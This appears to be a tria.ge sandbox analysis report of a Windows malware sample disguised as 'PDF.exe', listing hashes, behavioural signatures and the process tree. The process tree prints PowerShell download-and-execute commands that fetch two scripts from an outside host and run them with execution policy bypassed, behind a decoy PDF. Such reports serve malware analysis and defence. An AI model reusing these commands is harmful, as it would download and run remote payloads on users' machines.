Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
21/01/2025, 13:31
250121-qspexswjes 1021/01/2025, 12:04
250121-n8tngasrhm 1013/07/2024, 12:59
240713-p8a2ss1gpq 10Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
13/07/2024, 12:59
Static task
static1
Behavioral task
behavioral1
Sample
PDF.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
PDF.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
PDF.exe
Resource
win10v2004-20240709-en
General
-
Target
PDF.exe
-
Size
258KB
-
MD5
34c2047d0b69ba023b700c21431accc0
-
SHA1
e34c28611707c81565cb73d8a1a46dfc3ab2495a
-
SHA256
ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799
-
SHA512
a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7
-
SSDEEP
6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3
Malware Config
Extracted
http://thelustfactory.com/vns/1.ps1
Extracted
http://thelustfactory.com/vns/2.ps1
Signatures
-
Blocklisted process makes network request 6 IoCs
flow pid Process 5 2992 powershell.exe 6 2992 powershell.exe 7 2992 powershell.exe 9 2744 powershell.exe 10 2744 powershell.exe 11 2744 powershell.exe -
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
resource yara_rule behavioral1/files/0x00060000000186f7-57.dat pdf_with_link_action -
pid Process 2744 powershell.exe 2732 powershell.exe 2588 powershell.exe 2992 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 2644 timeout.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1724 AcroRd32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2992 powershell.exe 2744 powershell.exe 2732 powershell.exe 2588 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1724 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2992 powershell.exe Token: SeDebugPrivilege 2744 powershell.exe Token: SeDebugPrivilege 2732 powershell.exe Token: SeDebugPrivilege 2588 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1724 AcroRd32.exe 1724 AcroRd32.exe 1724 AcroRd32.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 2516 wrote to memory of 2276 2516 PDF.exe 30 PID 2516 wrote to memory of 2276 2516 PDF.exe 30 PID 2516 wrote to memory of 2276 2516 PDF.exe 30 PID 2276 wrote to memory of 2992 2276 cmd.exe 32 PID 2276 wrote to memory of 2992 2276 cmd.exe 32 PID 2276 wrote to memory of 2992 2276 cmd.exe 32 PID 2276 wrote to memory of 2744 2276 cmd.exe 33 PID 2276 wrote to memory of 2744 2276 cmd.exe 33 PID 2276 wrote to memory of 2744 2276 cmd.exe 33 PID 2276 wrote to memory of 2732 2276 cmd.exe 35 PID 2276 wrote to memory of 2732 2276 cmd.exe 35 PID 2276 wrote to memory of 2732 2276 cmd.exe 35 PID 2276 wrote to memory of 2588 2276 cmd.exe 36 PID 2276 wrote to memory of 2588 2276 cmd.exe 36 PID 2276 wrote to memory of 2588 2276 cmd.exe 36 PID 2276 wrote to memory of 2644 2276 cmd.exe 37 PID 2276 wrote to memory of 2644 2276 cmd.exe 37 PID 2276 wrote to memory of 2644 2276 cmd.exe 37 PID 2276 wrote to memory of 1724 2276 cmd.exe 38 PID 2276 wrote to memory of 1724 2276 cmd.exe 38 PID 2276 wrote to memory of 1724 2276 cmd.exe 38 PID 2276 wrote to memory of 1724 2276 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\PDF.exe"C:\Users\Admin\AppData\Local\Temp\PDF.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AEA7.tmp\AEA8.tmp\AEA9.bat C:\Users\Admin\AppData\Local\Temp\PDF.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/1.ps1', 'C:\Users\Admin\AppData\Roaming\1.ps1')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/2.ps1', 'C:\Users\Admin\AppData\Roaming\2.ps1')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\1.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\2.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
-
C:\Windows\system32\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:2644
-
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\pdf.pdf"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1724
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
712B
MD50e9ce5162ba7661c863a835f9d34d907
SHA10b351312ab57a02857753cab2287da680955f40d
SHA256b67f37e765a5be87d9591efdb0501f0c97aa342ad1e4c34a711828c4a505c81e
SHA5128d7c0a3cc95628cbec8a215f365c3ed86746e7b350c811ace5ea4419031adbdbe75dc7d1350d9c71db51f5cbb972db4e33b1d05e9a3e2a109c559eb065811ec0
-
Filesize
3KB
MD570018b3d6b22d46b2265de57a80ea789
SHA12d697e312c6302a704ea4b4a10f9a9a789459839
SHA2568af33d186d9e21b14177fa9cafb551cb64166f27d32b09dad7a39e91d4a24969
SHA5128aef07ab617ee137e5dc7af4adb3ebb2edf9f658883671ce01007e7c1b4e8feea4d1605b23419bf80a0ec52018325713375944135b31631579771f925ae39026
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD50b24a001f05c7457ecff8c90e07cd5ea
SHA150f810e6c8e7ef4374084a95cc6996133ffb10af
SHA256a29c20bd4a42291a3055b2c50a742bb36a3533ff71fe656843bd0483f5701ed8
SHA512e52aae53a68fac634b2110b346c9afb1fac03ac08a3f3597b7def57b00a1e116060c12311f06a04e2a51824bcc3e419878f173017cabecc93c5a1aa31bd8b762
-
Filesize
139KB
MD55afaf79789a776d81ec91ccbdc9fdaba
SHA16703901978dcb3dbf2d9915e1d3e066cfe712b0a
SHA25638c9792d725c45dd431699e6a3b0f0f8e17c63c9ac7331387ee30dcc6e42a511
SHA51209253eb87d097bdaa39f98cbbea3e6d83ee4641bca76c32c7eb1add17e9cb3117adb412d2e04ab251cca1fb19afa8b631d1e774b5dc8ae727f753fe2ffb5f288